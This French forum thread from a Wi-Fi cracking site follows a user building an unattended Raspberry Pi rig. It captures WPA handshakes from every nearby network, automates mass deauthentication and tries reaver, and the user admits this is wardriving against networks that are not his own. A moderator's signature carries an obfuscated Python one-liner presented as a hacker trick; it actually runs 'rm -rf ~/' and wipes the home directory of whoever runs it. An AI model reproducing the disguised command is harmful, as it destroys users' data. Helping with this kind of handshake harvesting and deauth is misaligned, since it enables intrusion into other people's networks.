Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-11-2013 15:19:06

Plumegrise
Nouveau membre
Inscription : 02-11-2013
Messages : 8

Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Bonjour,

bien qu'il existe de nombreux scripts pour automatiser plus ou moins les scans faits avec aircrack, j'aimerais pousser l'automatisation encore un peu plus loin pour que celui-ci soit capable de générer des fichiers de capture pour chaque réseau qu'il scanne tout seul.

L'objectif est de le rendre assez autonome pour le lancer au démarrage d'un système (le raspberry pi), et pouvoir après tenter de bruteforcer le wpa plus tard tranquillement. Bien sûr, tout ça dans le seul but pédagogique et pour tester la sécurité de mon réseau domestique. :angel: .

Wifite semblait fait pour ça, pourtant dans les commandes je n'ai pas réussi à trouver comment générer un .cap pour chaque essid scanné.

J'ai donc cherché une autre solution, directement avec airodump cette fois-ci. La commande iw wlan0 scan | grep "SSID\| primary channel" liste les essid et le numéro du channel, par contre elle n'indique pas si le cryptage est de type wep ou wpa.

Vous avez une idée de comment faire ?

Bonne journée

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-11-2013 16:18:23

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Dumpe sur un canal, et trie par BSSID ensuite avec tcpdump par exemple.
Tu peux aussi utiliser l'option -a pour lire depuis un fichier d'aircrack pour trier ton gros fichier .cap


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 02-11-2013 16:31:18

Plumegrise
Nouveau membre
Inscription : 02-11-2013
Messages : 8

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Huuuum ... c'est vrai que le dump par canal peut être une bonne alternative, j'y avais pas pensé. Pour tcpdump jamais utilisé je vais voir ça.

Sur la doc aircrack ils disent qu'avec l'option -a on doit choisir entre wep et wpa. Et si le cap d'écoute de plusieurs réseaux contient les deux ? Lancer deux fois la commande.

ça avance merci bien

Hors Ligne

#4 02-11-2013 16:48:20

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Pourquoi tu dump pas tout en bloc pour ensuite filtrer avec l'option -e de aircrack ??

aircrack-ng -e <essid> *.cap

Dernière modification par coyotus (02-11-2013 16:49:18)


1310812721.gif

Hors Ligne

#5 02-11-2013 16:55:36

Plumegrise
Nouveau membre
Inscription : 02-11-2013
Messages : 8

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

J'viens de tester . ... ça marche. Comment faire compliqué quand on peut faire simple hmm !

Bon bah c'est niquel. Reste plus qu'à espérer récolter un maximum de handshakes, jbalance ça en tâche de fond au démarrage et c'est réglé.

Jsuis content merci

Hors Ligne

#6 03-11-2013 18:18:31

Plumegrise
Nouveau membre
Inscription : 02-11-2013
Messages : 8

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Pour aller plus loin : http://blog.techorganic.com/2010/12/cap … -mass.html

ça permet d'automatiser les deauth. J'aurais bien aimé revenir ici le regard fier et vous proposer un script qui automatise la liste des bssidd à deauth dans un fichier sans avoir à copier coller, mais même après y avoir passé l'après midi je n'ai pas réussi. Même si au final la commande avait de la gueule (egrep "([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}[[:space:]]{2}([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}" fichier.txt | sort -u), j'ai lamentablement échoué.

Tant pis, je suis une sous-merde.

Bonne soirée à vous

Hors Ligne

#7 03-11-2013 20:28:48

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Merci pour le lien, intéressant


1310812721.gif

Hors Ligne

#8 03-11-2013 20:43:43

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

 (egrep "([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}[[:space:]]{2}([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}" fichier.txt | sort -u), j'ai lamentablement échoué. 

big_smile

elle a de la gueule en effet.... nôtre ami antares le fait comme ça et ça marche bien:

 egrep "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$"

1jMek.png

je m'en sers allègrement dans WPSPIN pour faire un filtre bssid pour valider la conformité de la mac entrée par l'utilisateur, court et efficace.

merci antares wink

Hors Ligne

#9 03-11-2013 20:54:16

Plumegrise
Nouveau membre
Inscription : 02-11-2013
Messages : 8

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Bin si tu regardes on fait la même chose, dans ma grosse regexp ya juste deux fois la sienne avec entre les deux deux caractères espace, vu que je cherche à parser une ligne qui commence par deux adresses mac.

Jrebataillerais la dessus un peu plus tard, jvous tiendrais au courant si jtrouve un truc qui marche

Hors Ligne

#10 03-11-2013 21:03:55

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

ok, je pensais que c'était un problème de syntaxe...
Tu veux absolument le faire tout sur une ligne ou on a le droit de faire une boucle?

ok, je crois que tu as un 2 de trop

[email protected]:~$ echo "FF:BB:CC:66:91:04 FF:FF:FF:FF:FF:FF" | egrep "([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}[[:space:]]{2}([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}"
[email protected]:~$ echo "FF:BB:CC:66:91:04 FF:FF:FF:FF:FF:FF" | egrep "([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}[[:space:]]([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}"
FF:BB:CC:66:91:04 FF:FF:FF:FF:FF:FF

essaye comme ça

egrep "([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}[[:space:]]([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}"

Hors Ligne

#11 22-11-2013 03:24:09

Plumegrise
Nouveau membre
Inscription : 02-11-2013
Messages : 8

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

plop,

pour ceux que ça intéresse la commande pour récupérer les 2 adresse mac (station et materiel connecté) est egrep "([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}[[:space:]]{2}([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}" fichier.txt | cut -c1-37 | sort -u . Normallement ça devrait suffire pour parametrer une attaque automatique mass_deauth.

Je travaille toujours sur ce projet, ça avance doucement mais c'est pas à l'abandon. D'ailleurs si un codeur python se sent dispo pour répondre à quelques mails quand je bloque je dis pas non.

Au fait, vous arrivez à trouver la clé depuis les handshakes ? Parce que pour le moment c'est moyen moyen de mon côté (une clé recup grace à reaver mais l'identification marche pas, 2 handshake wpa, une freebox une neufbox , 30 millions de clé et rien pour le moment sad )

Hors Ligne

#12 22-11-2013 21:58:05

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Plumegripe, il faut qu'on developpe le SE social engineering

Hors Ligne

#13 23-11-2013 02:26:17

Plumegrise
Nouveau membre
Inscription : 02-11-2013
Messages : 8

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

Je préférerais éviter, le but justement c'est d'automatiser au maximum la procédure du boitier pour qu'il ne nécessite aucune intervention humaine directe pour récolter des données. Un ptit bidule capable de faire tout seul son boulot tranquille dans son coin en gros.

Au final je sais pas si je m'oriente vers la bonne direction. récupérer des handshakes ok mais après ça reste du bruteforce, c'est très aléatoire et jsuis vraiment pas convaincu de l'utilité du truc. On peut tester des millions de clé wpa, qui nous dit que l'utilisateur en a pas mit une personnelle et qu'avec nos chaines de x caractères générés aléatoirement on est pas totalement à côté ?

Ptete qu'il faut que je me concentre sur reaver uniquement. C'est un peu plus long mais ya beaucoup plus de chances de pouvoir récupérer un wpa psk comme ça

Hors Ligne

#14 23-11-2013 07:50:28

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

En gros tu veux faire du Wardriving ?


1310812721.gif

Hors Ligne

#15 23-11-2013 10:49:52

Plumegrise
Nouveau membre
Inscription : 02-11-2013
Messages : 8

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

J'ai pas de voiture mais ouais c'est le meme principe

Hors Ligne

#16 10-12-2013 01:48:44

warfares
Membre Hyperactif
Inscription : 01-04-2013
Messages : 52

Re : Automatisation aircrack : .cap pour chaque essid sans clavier ni ecran

salut, je ne sais pas si tu es encore sur le projet, mais si j'ai bien compris ( j'ai lu vite fait ) le script du lien que tu as donné il faut un fichier txt qui contient la liste des statios à deauth ?

j'ai fait un petit script qui je pense pourrai t'intéresser ( vers les lignes 220 )

il serait assez facile de le modifier ( genre en 3-10 lignes ça doit être  faisable ) pour juste, dès qu'il découvre une station , il la deauth immédiatement ( voir même des qu'il decouvre un bssid il deauth sur ff:ff:ff:ff:ff:ff en mode bourrin ) ( donc pas besoin de passer par un fichier tiers ), dans l'espoire d'avoir un handshake, et ile me semble que c'est ce que tu veux non ? )

voir soyons fou ( mais là c'est de la théorie ) dès qu'il découvre un AP, il essai de lancer un replay de traffic, comme ca si c'est du wep, ça te fera peut être assez d'IV pour être tranquil chez toi wink

Dernière modification par warfares (10-12-2013 01:51:27)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
aircrack-ng par baltigor
2 162 30-11-2016 20:46:48 par koala
2 146 30-11-2016 19:45:54 par flatounet
106 2188 28-11-2016 19:42:10 par koala
35 1827 23-11-2016 16:31:33 par roofnat
5 156 22-11-2016 18:48:09 par koala

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]